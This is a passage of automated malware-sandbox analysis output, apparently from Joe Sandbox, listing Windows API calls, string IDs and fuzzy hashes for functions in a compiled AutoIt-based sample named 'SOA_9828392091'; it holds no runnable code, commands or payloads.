                                      • SysFreeString.OLEAUT32(00000016), ref: 0097ADDF
                                      • VariantClear.OLEAUT32(?), ref: 0097AE35
                                      • VariantClear.OLEAUT32(?), ref: 0097AE44
                                      • VariantInit.OLEAUT32(00000000), ref: 0097AE80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                      • API String ID: 3730832054-3931177956
                                      • Opcode ID: b62da3572292c4f0d57fc04f98c916205bbe0ca8c0c9803c82b86abb1a4eef45
                                      • Instruction ID: e76a3b9502363ccec4ceb278a3de7aea507f9d4cd3307aaa46ff5b5a3a32b91d
                                      • Opcode Fuzzy Hash: b62da3572292c4f0d57fc04f98c916205bbe0ca8c0c9803c82b86abb1a4eef45
                                      • Instruction Fuzzy Hash: 68D1EF72A04606EFCB249F65C885B6EB7BAFF84710F14C855E4099B1D0DB78EC44DBA2
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 009971FC
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00997247
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                      • API String ID: 3974292440-4258414348
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0099E5AB
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0099BEAF), ref: 0099E607
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0099E647
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0099E68C
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0099E6C3
                                      • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0099BEAF), ref: 0099E6CF
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0099E6DF
                                      • DestroyCursor.USER32(?), ref: 0099E6EE
                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0099E70B
                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0099E717
                                        • Part of subcall function 00950FA7: __wcsicmp_l.LIBCMT ref: 00951030
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                      • String ID: .dll$.exe$.icl
                                      • API String ID: 3907162815-1154884017
                                      APIs
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                      • CharLowerBuffW.USER32(?,?), ref: 0097D292
                                      • GetDriveTypeW.KERNEL32 ref: 0097D2DF
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0097D327
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0097D35E
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0097D38C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                      • API String ID: 1148790751-4113822522
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,009A3973,00000016,0000138C,00000016,?,00000016,009CDDB4,00000000,?), ref: 009726F1
                                      • LoadStringW.USER32(00000000,?,009A3973,00000016), ref: 009726FA
                                      • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,009A3973,00000016,0000138C,00000016,?,00000016,009CDDB4,00000000,?,00000016), ref: 0097271C
                                      • LoadStringW.USER32(00000000,?,009A3973,00000016), ref: 0097271F
                                      • __swprintf.LIBCMT ref: 0097276F
                                      • __swprintf.LIBCMT ref: 00972780
                                      • _wprintf.LIBCMT ref: 00972829
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00972840
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                      • API String ID: 618562835-2268648507
                                      APIs
                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0097D0D8
                                      • __swprintf.LIBCMT ref: 0097D0FA
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0097D137
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0097D15C
                                      • _memset.LIBCMT ref: 0097D17B
                                      • _wcsncpy.LIBCMT ref: 0097D1B7
                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0097D1EC
                                      • CloseHandle.KERNEL32(00000000), ref: 0097D1F7
                                      • RemoveDirectoryW.KERNEL32(?), ref: 0097D200
                                      • CloseHandle.KERNEL32(00000000), ref: 0097D20A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                      • String ID: :$\$\??\%s
                                      • API String ID: 2733774712-3457252023
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0099BEF4,?,?), ref: 0099E754
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0099BEF4,?,?,00000000,?), ref: 0099E76B
                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0099BEF4,?,?,00000000,?), ref: 0099E776
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,0099BEF4,?,?,00000000,?), ref: 0099E783
                                      • GlobalLock.KERNEL32(00000000), ref: 0099E78C
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0099BEF4,?,?,00000000,?), ref: 0099E79B
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0099E7A4
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,0099BEF4,?,?,00000000,?), ref: 0099E7AB
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0099E7BC
                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,009BD9BC,?), ref: 0099E7D5
                                      • GlobalFree.KERNEL32(00000000), ref: 0099E7E5
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0099E809
                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0099E834
                                      • DeleteObject.GDI32(00000000), ref: 0099E85C
                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0099E872
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                      • String ID:
                                      • API String ID: 3840717409-0
                                      APIs
                                      • __wsplitpath.LIBCMT ref: 0098076F
                                      • _wcscat.LIBCMT ref: 00980787
                                      • _wcscat.LIBCMT ref: 00980799
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009807AE
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 009807C2
                                      • GetFileAttributesW.KERNEL32(?), ref: 009807DA
                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 009807F4
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00980806
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                      • String ID: *.*
                                      • API String ID: 34673085-438819550
                                      APIs
                                        • Part of subcall function 0096ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0096ABD7
                                        • Part of subcall function 0096ABBB: GetLastError.KERNEL32(?,0096A69F,?,?,?), ref: 0096ABE1
                                        • Part of subcall function 0096ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0096A69F,?,?,?), ref: 0096ABF0
                                        • Part of subcall function 0096ABBB: RtlAllocateHeap.NTDLL(00000000,?,0096A69F), ref: 0096ABF7
                                        • Part of subcall function 0096ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0096AC0E
                                        • Part of subcall function 0096AC56: GetProcessHeap.KERNEL32(00000008,0096A6B5,00000000,00000000,?,0096A6B5,?), ref: 0096AC62
                                        • Part of subcall function 0096AC56: RtlAllocateHeap.NTDLL(00000000,?,0096A6B5), ref: 0096AC69
                                        • Part of subcall function 0096AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0096A6B5,?), ref: 0096AC7A
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0096A8CB
                                      • _memset.LIBCMT ref: 0096A8E0
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0096A8FF
                                      • GetLengthSid.ADVAPI32(?), ref: 0096A910
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0096A94D
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0096A969
                                      • GetLengthSid.ADVAPI32(?), ref: 0096A986
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0096A995
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0096A99C
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0096A9BD
                                      • CopySid.ADVAPI32(00000000), ref: 0096A9C4
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0096A9F5
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0096AA1B
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0096AA2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                      • String ID:
                                      • API String ID: 2347767575-0
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LoadString__swprintf_wprintf
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 2889450990-2391861430
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LoadString__swprintf_wprintf
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 2889450990-3420473620
                                      APIs
                                      • _memset.LIBCMT ref: 009755D7
                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00975664
                                      • GetMenuItemCount.USER32(009F1708), ref: 009756ED
                                      • DeleteMenu.USER32(009F1708,00000005,00000000,000000F5,?,?), ref: 0097577D
                                      • DeleteMenu.USER32(009F1708,00000004,00000000), ref: 00975785
                                      • DeleteMenu.USER32(009F1708,00000006,00000000), ref: 0097578D
                                      • DeleteMenu.USER32(009F1708,00000003,00000000), ref: 00975795
                                      • GetMenuItemCount.USER32(009F1708), ref: 0097579D
                                      • SetMenuItemInfoW.USER32(009F1708,00000004,00000000,00000030), ref: 009757D3
                                      • GetCursorPos.USER32(?), ref: 009757DD
                                      • SetForegroundWindow.USER32(00000000), ref: 009757E6
                                      • TrackPopupMenuEx.USER32(009F1708,00000000,?,00000000,00000000,00000000), ref: 009757F9
                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00975805
                                      Similarity
                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                      • String ID:
                                      • API String ID: 3993528054-0
                                      • Opcode ID: 84e1c3cccda8db0c635f85cfe4b8f362d086346920732c3f1a5583fd72005a58
                                      • Instruction ID: 83e394ed173cb656c71e22eb10c42faffded33ac27b53210fdd605080fbafc8b
                                      • Opcode Fuzzy Hash: 84e1c3cccda8db0c635f85cfe4b8f362d086346920732c3f1a5583fd72005a58
                                      • Instruction Fuzzy Hash: D8711232645A05BFEB649B14CC49FAABF69FF40368F258209F51CAA1D1D7F16C10DB90
                                      APIs
                                      • _memset.LIBCMT ref: 0096A1DC
                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0096A211
                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0096A22D
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0096A249
                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0096A273
                                      • CLSIDFromString.COMBASE(?,?), ref: 0096A29B
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0096A2A6
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0096A2AB
                                      Strings
                                      Similarity
                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                      • API String ID: 1687751970-22481851
                                      • Opcode ID: 8f344dbdad03b03130575f54d6a806c2b56e0efc0307802ce94e4c9eae51efd2
                                      • Instruction ID: 475dee9714308b0304e74e7a46b8cf0ac6957a186d9b5e1716711de2f484af91
                                      • Opcode Fuzzy Hash: 8f344dbdad03b03130575f54d6a806c2b56e0efc0307802ce94e4c9eae51efd2
                                      • Instruction Fuzzy Hash: 4541E576C15229ABDB21EBA4DC95EEDB7B8FF48310F00412AE911B3161EB709E05DF50
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009A36F4,00000010,?,Bad directive syntax error,009CDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009725D6
                                      • LoadStringW.USER32(00000000,?,009A36F4,00000010), ref: 009725DD
                                      • _wprintf.LIBCMT ref: 00972610
                                      • __swprintf.LIBCMT ref: 00972632
                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009726A1
                                      Strings
                                      Similarity
                                      • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                      • API String ID: 1080873982-4153970271
                                      • Opcode ID: 713149bcb286fe9d9b5e75322db5c334f40b9a4d75d5a5b2beeda7f4ffd947bc
                                      • Instruction ID: 3592850f82411b058d9f7f8ed96e62a378d59a30f096c0d6327bbc57917ddf0b
                                      • Opcode Fuzzy Hash: 713149bcb286fe9d9b5e75322db5c334f40b9a4d75d5a5b2beeda7f4ffd947bc
                                      • Instruction Fuzzy Hash: D4215C7281021AAFCF12EB90CC4AFEE7B79BF58308F044456F515660A2EB71AA18DF50
                                      APIs
                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00977B42
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00977B58
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00977B69
                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00977B7B
                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00977B8C
                                      Strings
                                      Similarity
                                      • API ID: SendString
                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                      • API String ID: 890592661-1007645807
                                      • Opcode ID: 91fffc0bce5a6ccb359d15653d43d3b18c7c5abc66a1533a303eb9f6c5662472
                                      • Instruction ID: 955202c296af5fdadcd72eb748e2667ef7b4aebe72e03ef54444ec1b23d7ec5f
                                      • Opcode Fuzzy Hash: 91fffc0bce5a6ccb359d15653d43d3b18c7c5abc66a1533a303eb9f6c5662472
                                      • Instruction Fuzzy Hash: BC1194E165029979D721B7A2CC4AEFFBBBCEBD1B14F0045197415A30D1EE705E45CAB0
                                      APIs
                                      • timeGetTime.WINMM ref: 00977794
                                        • Part of subcall function 0094DC38: timeGetTime.WINMM(?,7694B400,009A58AB), ref: 0094DC3C
                                      • Sleep.KERNEL32(0000000A), ref: 009777C0
                                      • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 009777E4
                                      • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00977806
                                      • SetActiveWindow.USER32 ref: 00977825
                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00977833
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00977852
                                      • Sleep.KERNEL32(000000FA), ref: 0097785D
                                      • IsWindow.USER32 ref: 00977869
                                      • EndDialog.USER32(00000000), ref: 0097787A
                                      Strings
                                      Similarity
                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                      • String ID: BUTTON
                                      • API String ID: 1194449130-3405671355
                                      • Opcode ID: 21dbe8a329d462ca801bb1170ed0c4adde6525025ba53066804b4348590d7fa8
                                      • Instruction ID: f8e09825f3adc011e38fbeb4f5746ba08657b49f145b014ef678c5016b98ca2a
                                      • Opcode Fuzzy Hash: 21dbe8a329d462ca801bb1170ed0c4adde6525025ba53066804b4348590d7fa8
                                      • Instruction Fuzzy Hash: 7C215EB222D205BFE7159BA0EC89B7A7F69FB44358F408124F51982166EBA94D00EA25
                                      APIs
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                      • CoInitialize.OLE32(00000000), ref: 0098034B
                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009803DE
                                      • SHGetDesktopFolder.SHELL32(?), ref: 009803F2
                                      • CoCreateInstance.COMBASE(009BDA8C,00000000,00000001,009E3CF8,?), ref: 0098043E
                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009804AD
                                      • CoTaskMemFree.COMBASE(?), ref: 00980505
                                      • _memset.LIBCMT ref: 00980542
                                      • SHBrowseForFolderW.SHELL32(?), ref: 0098057E
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009805A1
                                      • CoTaskMemFree.COMBASE(00000000), ref: 009805A8
                                      • CoTaskMemFree.COMBASE(00000000), ref: 009805DF
                                      • CoUninitialize.COMBASE ref: 009805E1
                                      Similarity
                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                      • String ID:
                                      • API String ID: 1246142700-0
                                      • Opcode ID: 0fc0d1be056c21c9af70dd6f10e217a59b7a899c449eb0ddcb1f784331032a8c
                                      • Instruction ID: 3be617254ba92ca40e5992a33fb43d609b9adc2ea2d2fae09b24d7eb8ed025d1
                                      • Opcode Fuzzy Hash: 0fc0d1be056c21c9af70dd6f10e217a59b7a899c449eb0ddcb1f784331032a8c
                                      • Instruction Fuzzy Hash: 7BB1C975A00109AFDB04DFA5C889EAEBBB9EF88314F148469F809EB251D770EE45CF50
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00972ED6
                                      • SetKeyboardState.USER32(?), ref: 00972F41
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00972F61
                                      • GetKeyState.USER32(000000A0), ref: 00972F78
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00972FA7
                                      • GetKeyState.USER32(000000A1), ref: 00972FB8
                                      • GetAsyncKeyState.USER32(00000011), ref: 00972FE4
                                      • GetKeyState.USER32(00000011), ref: 00972FF2
                                      • GetAsyncKeyState.USER32(00000012), ref: 0097301B
                                      • GetKeyState.USER32(00000012), ref: 00973029
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00973052
                                      • GetKeyState.USER32(0000005B), ref: 00973060
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: 26cdcbb48fba21c6198f3ef5326d6dd36516d84c579dfc5e975e39cfd756d2ba
                                      • Instruction ID: 9de88c4b594ca6ba85e1325b2e88eff00617611a6836e28b3c6a83df7b4f4737
                                      • Opcode Fuzzy Hash: 26cdcbb48fba21c6198f3ef5326d6dd36516d84c579dfc5e975e39cfd756d2ba
                                      • Instruction Fuzzy Hash: 5E51EA2291878469FB35EBB48811BEABFF85F11340F08C59DD5CA561C2DB549B8CC762
                                      APIs
                                      • GetDlgItem.USER32(?,00000001), ref: 0096ED1E
                                      • GetWindowRect.USER32(00000000,?), ref: 0096ED30
                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0096ED8E
                                      • GetDlgItem.USER32(?,00000002), ref: 0096ED99
                                      • GetWindowRect.USER32(00000000,?), ref: 0096EDAB
                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0096EE01
                                      • GetDlgItem.USER32(?,000003E9), ref: 0096EE0F
                                      • GetWindowRect.USER32(00000000,?), ref: 0096EE20
                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0096EE63
                                      • GetDlgItem.USER32(?,000003EA), ref: 0096EE71
                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0096EE8E
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0096EE9B
                                      Similarity
                                      • API ID: Window$ItemMoveRect$Invalidate
                                      • String ID:
                                      • API String ID: 3096461208-0
                                      • Opcode ID: 7cc38d97496cf5b8a285dfd9682b2ce9898486a67da9331d5fbc044bda7a2983
                                      • Instruction ID: 52595ba95ffbcfdc2c6a867e424ee67bf6be12d0360ab1427bf21749bf0e616b
                                      • Opcode Fuzzy Hash: 7cc38d97496cf5b8a285dfd9682b2ce9898486a67da9331d5fbc044bda7a2983
                                      • Instruction Fuzzy Hash: 7C511F75B10205EFDB18CF69DD95AAEBBBAEB88710F148229F519D7290E7709D048B10
                                      APIs
                                        • Part of subcall function 0094B526: GetWindowLongW.USER32(?,000000EB), ref: 0094B537
                                      • GetSysColor.USER32(0000000F), ref: 0094B438
                                      Similarity
                                      • API ID: ColorLongWindow
                                      • String ID:
                                      • API String ID: 259745315-0
                                      • Opcode ID: 6c6cc39a197375435e3889bb7feb318d464180334c1e61258dd5fc162b1b359e
                                      • Instruction ID: ba59616d3d86539df81493ae2685820eb261572523259d9dcc7c9840366ff7ce
                                      • Opcode Fuzzy Hash: 6c6cc39a197375435e3889bb7feb318d464180334c1e61258dd5fc162b1b359e
                                      • Instruction Fuzzy Hash: 5441CF34009100AFDB245F28D889FB93B6AAB06731F184761FD668A1F6D730CD42EB61
                                      APIs
                                      Similarity
                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                      • String ID:
                                      • API String ID: 136442275-0
                                      • Opcode ID: c9bdab394e75247884217d607a877c8802f1185043b65c8be8200bab3a2517b2
                                      • Instruction ID: ea75489078552ac5a074a30fe856133818ef2aed738c0c8c082c53bb6f86705e
                                      • Opcode Fuzzy Hash: c9bdab394e75247884217d607a877c8802f1185043b65c8be8200bab3a2517b2
                                      • Instruction Fuzzy Hash: F9410E7784521CAECF65DB95CC45EDA73BCEBC4310F0041E6BA99A2051EB30ABE98F50
                                      APIs
                                      • CharLowerBuffW.USER32(009CDC00,009CDC00,009CDC00), ref: 0097D7CE
                                      • GetDriveTypeW.KERNEL32(?,009E3A70,00000061), ref: 0097D898
                                      • _wcscpy.LIBCMT ref: 0097D8C2
                                      Strings
                                      Similarity
                                      • API ID: BuffCharDriveLowerType_wcscpy
                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                      • API String ID: 2820617543-1000479233
                                      • Opcode ID: fa36f5050279857a74dc19b628af0f1c4f5b21962a9dad49ab4232e04dec46f2
                                      • Instruction ID: 39ce7a01097eed7c0e36b72094b7d13c75d2b6d2b70bb997b62d8fe37636cfa7
                                      • Opcode Fuzzy Hash: fa36f5050279857a74dc19b628af0f1c4f5b21962a9dad49ab4232e04dec46f2
                                      • Instruction Fuzzy Hash: D7517C72509340AFC710EF14D892BAAB7B5EFC4314F10C92DF99A572A2DB31EE45CA42
                                      APIs
                                      • __swprintf.LIBCMT ref: 009393AB
                                      • __itow.LIBCMT ref: 009393DF
                                        • Part of subcall function 00951557: _xtow@16.LIBCMT ref: 00951578
                                      Similarity
                                      • API ID: __itow__swprintf_xtow@16
                                      • String ID: %.15g$0x%p$False$True
                                      • API String ID: 1502193981-2263619337
                                      • Opcode ID: 6b22c7b6cf42c522ddf65c2f60667b5f293434a5e0f7240baff0d777f54c0e62
                                      • Instruction ID: 3d18fdf44be8ad0397819758fd9f2fa2e6fe0ca654c74c63cf1cf5960a2a739e
                                      • Opcode Fuzzy Hash: 6b22c7b6cf42c522ddf65c2f60667b5f293434a5e0f7240baff0d777f54c0e62
                                      • Instruction Fuzzy Hash: DF41E571504205ABDB24EB74D946FAAB3F8EFC9310F20486AF58ED71C1EAB19941CF51
                                      APIs
                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0099A259
                                      • CreateCompatibleDC.GDI32(00000000), ref: 0099A260
                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0099A273
                                      • SelectObject.GDI32(00000000,00000000), ref: 0099A27B
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0099A286
                                      • DeleteDC.GDI32(00000000), ref: 0099A28F
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0099A299
                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0099A2AD
                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0099A2B9
                                      Similarity
                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                      • String ID: static
                                      • API String ID: 2559357485-2160076837
                                      • Opcode ID: 3ac4a6d049c27ff3e299f135aea95991e9d5f6b12a3e4aa44624c2e30aed5844
                                      • Instruction ID: a32ab02510097df5553f3a55bc4d7bc88d1fcfa6ff9000e856e86f136bd1cecb
                                      • Opcode Fuzzy Hash: 3ac4a6d049c27ff3e299f135aea95991e9d5f6b12a3e4aa44624c2e30aed5844
                                      • Instruction Fuzzy Hash: 2D31BE31105115ABDF219FA8DD49FEE3B6DFF0A320F100314FA29A20A0D736D811EBA0
                                      Similarity
                                      • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                      • String ID: 0.0.0.0
                                      • API String ID: 2620052-3771769585
                                      • Opcode ID: 6a3ce18a5ebabd0841bb5de3af9f766dbe0b5f2a86cbf132c651d7298c51d06b
                                      • Instruction ID: b5694e009b6ff210dda7ce8d8d780bd998960dccb06ac1a5a23ce2efead1ca89
                                      • Opcode Fuzzy Hash: 6a3ce18a5ebabd0841bb5de3af9f766dbe0b5f2a86cbf132c651d7298c51d06b
                                      • Instruction Fuzzy Hash: 1C110672908215ABCB24AB71EC4AFEA77BCEF80721F0441A5F449A6081FF70DE859B50
                                      APIs
